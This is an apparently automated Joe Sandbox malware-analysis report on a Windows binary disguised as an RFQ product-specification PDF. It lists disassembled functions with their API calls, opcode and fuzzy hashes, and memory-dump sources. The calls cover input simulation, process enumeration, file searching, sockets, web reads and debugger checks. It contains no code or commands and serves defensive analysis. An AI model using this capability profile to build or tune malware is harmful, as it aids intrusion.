                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __floor_pentium4
                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                • Opcode ID: 2886692bd5148a556decc0fe4fb443693300636748643f0857c0650eeb0adeea
                                                                                                                • Instruction ID: 393ec98bed5bc98d2fe12a7e2c6b2f125ee9e426b59c5eeb6476723d0495d7c7
                                                                                                                • Opcode Fuzzy Hash: 2886692bd5148a556decc0fe4fb443693300636748643f0857c0650eeb0adeea
                                                                                                                • Instruction Fuzzy Hash: D6C23B72E086288FDB25CF28DD407EAB7B5EB49315F1481EAD84DE7241E775AE818F40
                                                                                                                Function 00AB648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 00AB64DC
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00AB6639
                                                                                                                • CoCreateInstance.OLE32(00ADFCF8,00000000,00000001,00ADFB68,?), ref: 00AB6650
                                                                                                                • CoUninitialize.OLE32 ref: 00AB68D4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 886957087-24824748
                                                                                                                • Opcode ID: cc1b1a62eb899a2f607d46e20b1e47ba062d87e227d9cf1b69ca0e5e998290ee
                                                                                                                • Instruction ID: 229382ee0047ed4853d0a8e41fec4d18863fb57e1557b5cddb62618beaeeda09
                                                                                                                • Opcode Fuzzy Hash: cc1b1a62eb899a2f607d46e20b1e47ba062d87e227d9cf1b69ca0e5e998290ee
                                                                                                                • Instruction Fuzzy Hash: 74D14875508301AFC314EF24C9819ABB7E8FFD8704F00496DF5958B2A2EB71E909CB92
                                                                                                                Function 00AC22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 00AC22E8
                                                                                                                  • Part of subcall function 00ABE4EC: GetWindowRect.USER32(?,?), ref: 00ABE504
                                                                                                                • GetDesktopWindow.USER32 ref: 00AC2312
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AC2319
                                                                                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00AC2355
                                                                                                                • GetCursorPos.USER32(?), ref: 00AC2381
                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AC23DF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                • String ID:
                                                                                                                • API String ID: 2387181109-0
                                                                                                                • Opcode ID: 684a4b7e299d75049190b54e9190bf00759286f97e6738aeaf192f25c2599464
                                                                                                                • Instruction ID: c7c0eeeb289dd09f1948d2fb83abe96bb8d8096785411b38e1347eabf25a59d3
                                                                                                                • Opcode Fuzzy Hash: 684a4b7e299d75049190b54e9190bf00759286f97e6738aeaf192f25c2599464
                                                                                                                • Instruction Fuzzy Hash: 4631CF72505356ABC720DF54D845F9BB7A9FF84710F00091EF9859B281DB34EA09CB92
                                                                                                                Function 00AB9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00AB9B78
                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00AB9C8B
                                                                                                                  • Part of subcall function 00AB3874: GetInputState.USER32 ref: 00AB38CB
                                                                                                                  • Part of subcall function 00AB3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB3966
                                                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00AB9BA8
                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00AB9C75
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1972594611-438819550
                                                                                                                • Opcode ID: c88eeaed3838102fc076f02ca122d1593b332cde71f0bac54b9d9874cffabca6
                                                                                                                • Instruction ID: 12f37d0fbeef038c0e8bf8feee78f4127974a5617579e9efbc3ecafb1b1c2327
                                                                                                                • Opcode Fuzzy Hash: c88eeaed3838102fc076f02ca122d1593b332cde71f0bac54b9d9874cffabca6
                                                                                                                • Instruction Fuzzy Hash: 88417F7194420AAFDF14DFA4C989AEFBBB8EF46310F244156E905A7192EB309E44CF61
                                                                                                                Function 00A5997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00A59A4E
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00A59B23
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 00A59B36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$LongProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3131106179-0
                                                                                                                • Opcode ID: 74182a5ee46817a70e4effb75f1501f8f4aceb311dc121ac446bfe93dc2c92cb
                                                                                                                • Instruction ID: 4b77cd35bec64cdbebb23428a8379cda8c500e624c54753e0cd09385694465f2
                                                                                                                • Opcode Fuzzy Hash: 74182a5ee46817a70e4effb75f1501f8f4aceb311dc121ac446bfe93dc2c92cb
                                                                                                                • Instruction Fuzzy Hash: 91A109B0218544EEEB259B3C9D48DBF36EDFB42382B15410AFA02DE695CA359D06D272
                                                                                                                Function 00AC1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AC304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AC307A
                                                                                                                  • Part of subcall function 00AC304E: _wcslen.LIBCMT ref: 00AC309B
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AC185D
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1884
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00AC18DB
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC18E6
                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AC1915
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1601658205-0
                                                                                                                • Opcode ID: 497c3b6dac50549d0951312e31ead80041a3b4bd6d2090710f87eeefbb835b91
                                                                                                                • Instruction ID: 9b08eecb50ebc5271bd8a2e27ac01850aad03eed6c7cf46e78d0f971830bd4e3
                                                                                                                • Opcode Fuzzy Hash: 497c3b6dac50549d0951312e31ead80041a3b4bd6d2090710f87eeefbb835b91
                                                                                                                • Instruction Fuzzy Hash: 0F51C175A00210AFDB10EF24C986F2AB7E5AB85718F04849CF90A5F383D771AD41CBA1
                                                                                                                Function 00AD1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                • String ID:
                                                                                                                • API String ID: 292994002-0
                                                                                                                • Opcode ID: 622918ee6761014b6405a3eaa0af6d2c45ddb8763f0e9ab74df58a3249b991a4
                                                                                                                • Instruction ID: e853ae1bc92fb3eef08003c84e26d0cad495d469c9ad878a4a31a4e1c62963c0
                                                                                                                • Opcode Fuzzy Hash: 622918ee6761014b6405a3eaa0af6d2c45ddb8763f0e9ab74df58a3249b991a4
                                                                                                                • Instruction Fuzzy Hash: 8421F4317512016FD7208F2AC884F6A7BE5EF95325F58806AE84BCB351DB71EC42CB90
                                                                                                                Function 00A48060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                • API String ID: 0-1546025612
                                                                                                                • Opcode ID: 7af6be4f12d9990e13e64013f579adec83cec79ae4992d4904bd6ca8fdd57d70
                                                                                                                • Instruction ID: 4706602a42bc97cf6be88d3810d25877371fe1e10ac4e5dcb6ef4567b1f21b0f
                                                                                                                • Opcode Fuzzy Hash: 7af6be4f12d9990e13e64013f579adec83cec79ae4992d4904bd6ca8fdd57d70
                                                                                                                • Instruction Fuzzy Hash: D4A29F74E0061ACBDF24DF58D9407EEB7B1BF94314F2481AAE815AB285EB749D81CF90
                                                                                                                Function 00ACA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00ACA6AC
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00ACA6BA
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00ACA79C
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACA7AB
                                                                                                                  • Part of subcall function 00A5CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00A83303,?), ref: 00A5CE8A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1991900642-0
                                                                                                                • Opcode ID: 2e1239da7fc0992ca89c60c7c70ecc02bd98263c259992668b26f1b242622804
                                                                                                                • Instruction ID: d30378f35ebc94e75b707fe775f8be82bb0fe5694615d70042d631b042ba8f0d
                                                                                                                • Opcode Fuzzy Hash: 2e1239da7fc0992ca89c60c7c70ecc02bd98263c259992668b26f1b242622804
                                                                                                                • Instruction Fuzzy Hash: 81514975508301AFD710EF24C986E6BBBE8FF89754F40491DF98A97252EB30D904CB92
                                                                                                                Function 00AAAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00AAAAAC
                                                                                                                • SetKeyboardState.USER32(00000080), ref: 00AAAAC8
                                                                                                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00AAAB36
                                                                                                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00AAAB88
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: c062ffbeb78d72bc58f545834f21f40f0f1ab571260312014e443bc350a8dcc8
                                                                                                                • Instruction ID: bc736056f41af5e32e865af9581e9d64777148ab69fbf4febd128caa7908e9b4
                                                                                                                • Opcode Fuzzy Hash: c062ffbeb78d72bc58f545834f21f40f0f1ab571260312014e443bc350a8dcc8
                                                                                                                • Instruction Fuzzy Hash: B731E330A80648AEEB35CB64CC05BFA7BE6EB66320F04821AE581975E1D3758D85D772
                                                                                                                Function 00ABCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00ABCE89
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00ABCEEA
                                                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 00ABCEFE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorEventFileInternetLastRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 234945975-0
                                                                                                                • Opcode ID: a2b745910e2f88fe5ab5526db894d7dbc4608d6a4368c2c05c947b7bbac3e316
                                                                                                                • Instruction ID: b11735057fafa97f850f363ac7001320c0389ff51cc61140b76706a6589f78e9
                                                                                                                • Opcode Fuzzy Hash: a2b745910e2f88fe5ab5526db894d7dbc4608d6a4368c2c05c947b7bbac3e316
                                                                                                                • Instruction Fuzzy Hash: B3219DB1600306EBDB20DFA5C948FA7B7FCEB40364F10445EE54692152E770EE05CBA0
                                                                                                                Function 00AADBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,00A85222), ref: 00AADBCE
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00AADBDD
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AADBEE
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AADBFA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2695905019-0
                                                                                                                • Opcode ID: 576516418daab862f46a989e78c0ec6524eafe1c87704ec12e8e88491b8c1b29
                                                                                                                • Instruction ID: 198d959d0516656b55a96f6d9137e7870a152574a940da8c0a4509c9c11e088f
                                                                                                                • Opcode Fuzzy Hash: 576516418daab862f46a989e78c0ec6524eafe1c87704ec12e8e88491b8c1b29
                                                                                                                • Instruction Fuzzy Hash: 46F0A03081192167C220AFB8AC0D8AA377C9E02334B904713F8B7C24E0EBB45D56C695
                                                                                                                Function 00AA8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AA82AA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: ($|
                                                                                                                • API String ID: 1659193697-1631851259
                                                                                                                • Opcode ID: 7b74adc89cfc38ccf8cef03a48e9c005e415e492ec9e8de045d170b4d8e9f33f
                                                                                                                • Instruction ID: f8d8379291e46561bd7173b3df1a428e64049c95f270fcf98b3d4566223df676
                                                                                                                • Opcode Fuzzy Hash: 7b74adc89cfc38ccf8cef03a48e9c005e415e492ec9e8de045d170b4d8e9f33f
                                                                                                                • Instruction Fuzzy Hash: D5322575A007059FCB28CF59C481A6AB7F0FF48710B15C56EE89ADB3A1EB74E981CB50
                                                                                                                Function 00AB5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AB5CC1
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00AB5D17
                                                                                                                • FindClose.KERNEL32(?), ref: 00AB5D5F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 3541575487-0
                                                                                                                • Opcode ID: 383d315ece3c8e907dda39be301c18574c7778da158fd1728758e6f2d046bf21
                                                                                                                • Instruction ID: 76ed7725011377b76d4d916b271f3216734f5f0ce49e4110f1b30bbc082c8d5c
                                                                                                                • Opcode Fuzzy Hash: 383d315ece3c8e907dda39be301c18574c7778da158fd1728758e6f2d046bf21
                                                                                                                • Instruction Fuzzy Hash: D1518A75A04A019FC714DF28C494A9AB7E8FF49324F14865EE95A8B3A2DB30FD05CF91
                                                                                                                Function 00A72622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00A7271A
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A72724
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00A72731
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
